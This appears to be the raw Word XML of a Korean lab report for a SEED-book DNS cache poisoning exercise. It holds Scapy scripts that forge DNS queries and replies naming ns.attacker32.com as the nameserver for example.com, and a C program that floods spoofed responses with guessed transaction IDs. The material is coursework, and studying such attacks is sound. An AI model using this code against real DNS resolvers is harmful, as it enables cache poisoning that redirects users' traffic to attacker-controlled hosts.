          <w:p w14:paraId="7454BE48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             qdcount=1, ancount=1, nscount=1, an=Anssec, ns=NSsec)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7214C138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2145854B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# Construct the entire IP packet and send it out</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="03176325" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="0000000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</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>spoofpkt = IPpkt/UDPpkt/DNSpkt</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="33432E33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        </w:t>
            </w:r>
            <w:r w:rsidRPr="00F10630">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>send(spoofpkt)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3350375E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2768DDA7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pkt = sniff(iface=my_iface, filter=my_filter, prn=spoof_dns)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D0C1499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</w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5246B686" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRPr="00F10630" w:rsidRDefault="00E65B3A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DD5126F" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRPr="00F10630" w:rsidRDefault="00E65B3A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="723131C5" w14:textId="77777777" w:rsidR="00E65B3A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5번 문제의 전체 코드(C코드 미포함)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="ae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E65B3A" w:rsidRPr="00F10630" w14:paraId="527B9853" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="110"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9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F3FBC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highlight w:val="cyan"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F10630">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="cyan"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>problem5_dns_query_template.py</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F4D0229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#!/usr/bin/python3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5858CA31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from scapy.all import *</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="615197D6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123AC503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 based on SEED book code</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73A4B684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10FAC929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targetName = 'twysw.example.com'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0003F042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local_DNS_ip = '10.9.0.53'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3224B698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spoofed_ip = '1.2.3.4'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="457DBBEA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039EC762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 from a random src to local DNS server</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D539B6B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IPpkt  = IP(src='10.9.0.153',dst=local_DNS_ip)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B7E4725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067BFFE1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 from a random sport to DNS dport</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E141F5F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UDPpkt = UDP(sport=12345, dport=53,chksum=0)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="45046809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55180A05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 a inexistent fake FQDN in the target domain: example.com</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1645391C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 the C code will modify it</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="78ACB219" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00000000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Qdsec    = DNSQR(qname=targetName) </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14395B80" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00000000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DNSpkt   = DNS(id=0xAAAA, qr=0, qdcount=1, qd=Qdsec)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7777FF0F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Querypkt = IPpkt/UDPpkt/DNSpkt</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5180E02E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5825169B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lastRenderedPageBreak/>
              <w:t># Save the packet data to a file</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="21E1269B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with open('ip_req.bin', 'wb') as f:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5592CA2B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f.write(bytes(Querypkt))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B62C6DC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Querypkt.show()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1773CDB3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50A71588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34F1E384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highlight w:val="cyan"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F10630">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="cyan"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>problem5_dns_reply_template.py</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3EB20204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#!/usr/bin/python3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E041CBC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from scapy.all import *</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0ECF2481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3BB811ED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 based on SEED book code</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F947942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targetName = 'twysw.example.com'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1DFC8962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targetDomain = 'example.com'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C2F351D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3A15826F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NS_ip = '199.43.133.53'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6639C18D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local_DNS_ip = '10.9.0.53'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50C32745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spoofed_ip = '1.2.3.4'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69C6753B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7D8C393D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 reply pkt from target domain NSs to the local DNS server</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="077CCD14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IPpkt = IP(src=NS_ip, dst=local_DNS_ip, chksum=0)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59D42BBD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UDPpkt = UDP(sport=53, dport=33333, chksum=0)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B9EE9B2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5A782B0D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 Question section</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F18864F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Qdsec  = DNSQR(qname=targetName)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7AE576D0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500BFBE7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 Answer section, any IPs(rdata) are fine</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76CBADCC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Anssec = DNSRR(rrname=targetName, type='A',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7ED765FD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       rdata=spoofed_ip, ttl=259200)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="287096EB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025A8087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# Authority section (the main goal of the attack)               </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="650175A3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NSsec  = DNSRR(rrname=targetDomain, type='NS',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="040AC9B5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       rdata='ns.attacker32.com', ttl=259200)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2CE8E6EB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7DEF87C1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lastRenderedPageBreak/>
              <w:t>DNSpkt = DNS(id=0xAAAA, aa=1,ra=0, rd=0, cd=0, qr=1,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6937F4C4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     qdcount=1, ancount=1, nscount=1, arcount=0,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="22B5F492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     qd=Qdsec, an=Anssec, ns=NSsec)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3974580F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3F631B2E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Replypkt = IPpkt/UDPpkt/DNSpkt</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5816847C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72E55B8A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with open('ip_resp.bin', 'wb') as f:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="63F5BCCF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f.write(bytes(Replypkt))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65593ED1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Replypkt.show()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2BCBCE2A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44B0ECDC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</w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6A8F9146" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRPr="00F10630" w:rsidRDefault="00E65B3A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20C52491" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRPr="00F10630" w:rsidRDefault="00E65B3A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46188500" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00000000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6번 문제의 전체 코드(C코드 포함)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af"/>
        <w:tblW w:w="90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6"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E65B3A" w14:paraId="0398D34F" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9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31EED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highlight w:val="cyan"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F10630">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="cyan"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>problem6_dns_query_template.py</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="33B64057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#!/usr/bin/python3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71CF2610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from scapy.all import *</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="32F43990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5E5105A1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 based on SEED book code</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6551D3CB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0F36F894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targetName = 'twy.example.com'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4AEAF379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local_DNS_ip = '10.9.0.53'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="328B3B28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spoofed_ip = '1.2.3.4'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="22692AF9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37A26A33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 from a random src to local DNS server</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6CD0F4E6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IPpkt  = IP(src='10.9.0.153',dst=local_DNS_ip)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27501B9C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473FF37B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 from a random sport to DNS dport</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B6C9E48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UDPpkt = UDP(sport=12345, dport=53,chksum=0)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11011FE1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7330A79E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 a inexistent fake FQDN in the target domain: example.com</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C9B5109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 the C code will modify it</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D808AAD" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00000000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Qdsec    = DNSQR(qname=targetName) </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="275508D5" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00000000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DNSpkt   = DNS(id=0xAAAA, qr=0, qdcount=1, qd=Qdsec)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0440A222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Querypkt = IPpkt/UDPpkt/DNSpkt</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E98A228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0091AE07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 Save the packet data to a file</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6FCDFFAF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with open('ip_req.bin', 'wb') as f:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4CD6BECE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f.write(bytes(Querypkt))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6562CF28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Querypkt.show()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1AB22812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3FB7FBA7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103E0997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highlight w:val="cyan"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F10630">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="cyan"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>problem6_dns_reply_template.py</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3702AA1E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#!/usr/bin/python3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C450694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from scapy.all import *</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F1A591E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30D9CFC2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 based on SEED book code</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F0402B2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targetName = 'twy.example.com'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="47E82980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targetDomain = 'example.com'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="308CEE3D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299C72BA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NS_ip = '199.43.135.53'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71EA17DE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local_DNS_ip = '10.9.0.53'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3CA298BC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spoofed_ip = '1.2.3.4'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44CA2C27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1B0CB56D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 reply pkt from target domain NSs to the local DNS server</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5198E798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IPpkt = IP(src=NS_ip, dst=local_DNS_ip, chksum=0)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71F9999E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UDPpkt = UDP(sport=53, dport=33333, chksum=0)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F8735B7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512475EF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 Question section</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7ECD4476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Qdsec  = DNSQR(qname=targetName)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="23C85FA0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5909413C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 Answer section, any IPs(rdata) are fine</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="531878E8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Anssec = DNSRR(rrname=targetName, type='A',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6CE33B83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       rdata=spoofed_ip, ttl=259200)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="646F0B9F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131DB658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lastRenderedPageBreak/>
              <w:t xml:space="preserve"># Authority section (the main goal of the attack)               </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="75E910CD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NSsec  = DNSRR(rrname=targetDomain, type='NS',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="09368994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       rdata='ns.attacker32.com', ttl=259200)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C48A50C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59F06C43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DNSpkt = DNS(id=0xAAAA, aa=1,ra=0, rd=0, cd=0, qr=1,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="77763B4D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     qdcount=1, ancount=1, nscount=1, arcount=0,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0DCDE792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     qd=Qdsec, an=Anssec, ns=NSsec)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F39836A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4C7335E6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Replypkt = IPpkt/UDPpkt/DNSpkt</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7AE7A1D3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233823B9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with open('ip_resp.bin', 'wb') as f:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3BBF44A7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f.write(bytes(Replypkt))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="33B98958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Replypkt.show()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6FD6C42A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1D307F3D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688E03ED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highlight w:val="cyan"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F10630">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="cyan"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>problem6_atteck.c</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B3980DA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#include &lt;stdlib.h&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5810F84C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#include &lt;arpa/inet.h&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E1251EE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#include &lt;string.h&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3FDDD487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#include &lt;stdio.h&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C2F1A4E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#include &lt;unistd.h&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76110550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#include &lt;time.h&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0605CC3F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27793BDE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// based on the provided framework and SEED book code</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="70FA8937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#define MAX_FILE_SIZE 1000000</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="566EED74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78985953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07A7AB5C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/* IP Header */</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4665929B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struct ipheader {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="41B62843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unsigned char      iph_ihl:4, //IP header length</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="04337806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             iph_ver:4; //IP version</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="45901DF3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unsigned char      iph_tos; //Type of service</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44D9CDB7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unsigned short int iph_len; //IP Packet length (data + header)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72B5C888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lastRenderedPageBreak/>
              <w:t xml:space="preserve">  unsigned short int iph_ident; //Identification</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42DB0E8E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unsigned short int iph_flag:3, //Fragmentation flags</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="68CA2EE2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             iph_offset:13; //Flags offset</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F757104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unsigned char      iph_ttl; //Time to Live</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="477D62EC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unsigned char      iph_protocol; //Protocol type</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3048C19D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unsigned short int iph_chksum; //IP datagram checksum</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7238819E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struct  in_addr    iph_sourceip; //Source IP address </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7CD18594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struct  in_addr    iph_destip;   //Destination IP address </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0CFE7049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};</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18265B31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128522E5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void send_raw_packet(char * buffer, int pkt_size);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18987898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void send_dns_request(unsigned char* pkt, int pktsize, char* name);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C572B0C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void send_dns_response(unsigned char* pkt, int pktsize,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="271B3E4F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               unsigned char* src, char* name,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B321319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               unsigned short id);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B137AFA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25619AF2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int main()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C81EC63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{</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F566DD5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unsigned short transid = 0;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="01C02C05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446572AA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srand(time(NULL));</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02ECBC1B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4EF901D8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// Load the DNS request packet from file</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="41C8917D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FILE * f_req = fopen("ip_req.bin", "rb");</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="468246F8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if (!f_req) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0EE97AC7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perror("Can't open 'ip_req.bin'");</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E17E03D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exit(1);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6502439F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}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="22E92532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unsigned char ip_req[MAX_FILE_SIZE];</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6544C15C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int n_req = fread(ip_req, 1, MAX_FILE_SIZE, f_req);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19BACA3B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2DECEAD0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// Load the first DNS response packet from file</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74F8FBEF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FILE * f_resp = fopen("ip_resp.bin", "rb");</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0EE5FFE1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lastRenderedPageBreak/>
              <w:t xml:space="preserve">  if (!f_resp) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28961E8D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perror("Can't open 'ip_resp.bin'");</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="221EC976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exit(1);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="12237D3A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}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7687C6E0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unsigned char ip_resp[MAX_FILE_SIZE];</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51E5710A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int n_resp = fread(ip_resp, 1, MAX_FILE_SIZE, f_resp);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A2E7B99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14489D29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char a[26]="abcdefghijklmnopqrstuvwxyz";</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40C1FC0C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while (1) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6CEF1D24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// Generate a random name with length 3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C3DE48B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char name[4];</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D7562B7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name[3] = '\0';</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B58E57C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for (int k=0; k&lt;3; k++)  name[k] = a[rand() % 26];</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C68D28A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7C61C1C9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printf("name: %s, id:%d\n", name, transid);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D542B10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//##################################################################</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3104E5FF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/* Step 1. Send a DNS request to the targeted local DNS server.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="23F831AB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       This will trigger the DNS server to send out DNS queries */</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="03963249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3413C0BC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send_dns_request(ip_req, n_req, name);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74D5B832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46085671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48E905B1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/* Step 2. Send many spoofed responses to the targeted local DNS server,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E8C2C92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       each one with a different transaction ID. */</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5296ABA3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</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79437ACE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for (int i = 0; i &lt; 500; i++)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2CCB34F0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{</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0ABA97A9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send_dns_response(ip_resp, n_resp, "199.43.133.53", name, transid);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3358D1E9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send_dns_response(ip_resp, n_resp, "199.43.135.53", name, transid);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7179B53A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transid += 1;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="652A6D40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}    </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27AE21C5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lastRenderedPageBreak/>
              <w:t xml:space="preserve">    //##################################################################</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E523D29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}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14012963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}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B9D6621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3063A514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79C0C6BB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/* Use for generating and sending fake DNS request.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7394E54C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* */</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="322D8E12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void send_dns_request(unsigned char* pkt, int pktsize, char* name)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18B00CF4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{</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34ED99E6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// replace twysw in qname with name, at offset 41</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A35DB4F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memcpy(pkt+41, name, 3);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F2B1581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// send the dns query out</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="52E4CB5B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send_raw_packet(pkt, pktsize);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E5A4591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}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="582B878B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18FBBE5C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0CC28141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/* Use for generating and sending forged DNS response.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1CE54613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* */</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="22BE07DE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void send_dns_response(unsigned char* pkt, int pktsize,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F4095A1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               unsigned char* src, char* name,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1BB9345B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                unsigned short id)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B1A4C12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{</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2AE50D2E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// the C code will modify src,qname,rrname and the id field</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="303771DB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// src ip at offset 12</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A17B7B9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int ip = (int)inet_addr(src);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5AF013E4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memcpy(pkt+12, (void*)&amp;ip, 4);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4737E9F2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// qname at offset 41</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4716B3C4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memcpy(pkt+ 41, name, 3);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4CFB51A6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// rrname at offset 62</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="60783946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memcpy(pkt+ 62, name, 3);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F3A28D0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// id at offset 28</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="753CB376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lastRenderedPageBreak/>
              <w:t xml:space="preserve">  unsigned short transid = htons(id);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34BDB878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memcpy(pkt+28, (void*)&amp;transid, 2);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D5A9E25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//send the dns reply out</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4871E761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send_raw_packet(pkt, pktsize);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54C64A54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}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="561E6D67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6857F00B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10A0B7DB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/* Send the raw packet out </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00BA0895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*    buffer: to contain the entire IP packet, with everything filled out.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7BE7DC32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*    pkt_size: the size of the buffer.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08F7607B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* */</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="153D065C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void send_raw_packet(char * buffer, int pkt_size)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6129A953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>{</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1651ADF2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struct sockaddr_in dest_info;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="568AD9C1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int enable = 1;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27D0ADD6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0BA9B3BA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// Step 1: Create a raw network socket.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="086096E7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int sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C89D576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4ECEFCE3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// Step 2: Set socket option.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="75C87564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setsockopt(sock, IPPROTO_IP, IP_HDRINCL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="264C70DF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ab/>
              <w:t xml:space="preserve">     &amp;enable, sizeof(enable));</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D92D1EF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648C9D22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// Step 3: Provide needed information about destination.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0174FCFE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struct ipheader *ip = (struct ipheader *) buffer;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="001A555F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dest_info.sin_family = AF_INET;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D49E0BA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dest_info.sin_addr = ip-&gt;iph_destip;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="663EFBEC" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRPr="00F10630" w:rsidRDefault="00E65B3A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</w:p>
          <w:p w14:paraId="19537197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// Step 4: Send the packet out.</w:t>
            </w:r>
          </w:p>
